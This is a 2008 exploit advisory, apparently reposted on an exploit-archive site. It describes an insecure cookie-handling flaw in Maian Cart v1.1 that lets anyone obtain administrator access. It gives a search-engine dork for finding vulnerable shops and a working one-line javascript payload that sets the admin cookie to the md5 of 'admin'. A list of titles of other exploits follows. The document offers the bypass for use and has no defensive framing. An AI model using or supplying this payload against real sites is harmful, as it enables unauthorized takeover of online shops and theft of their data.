Author: Saime
Date: July 12, 2008
Script: Maian Cart v1.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by Maian Cart v1.1
Description:
Maian Car v1.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mccart_cookie,
equals admin username(md5)
Exploit:
javascript:document.cookie = "mccart_cookie=21232f297a57a5a743894a0e4a801fc3; path=/"
Note:
The cookie value must be md5(the username). For example, 21232f297a57a5a743894a0e4a801fc3 = admin
【Maian Cart 1.1 Insecure Cookie Handling Vulnerability】相关文章:
★ minb 0.1.0 Remote Code Execution Exploit
★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
★ BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service
★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit
★ Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit
★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
★ BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd)
★ ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities
★ Maian Greetings 2.1 Insecure Cookie Handling Vulnerability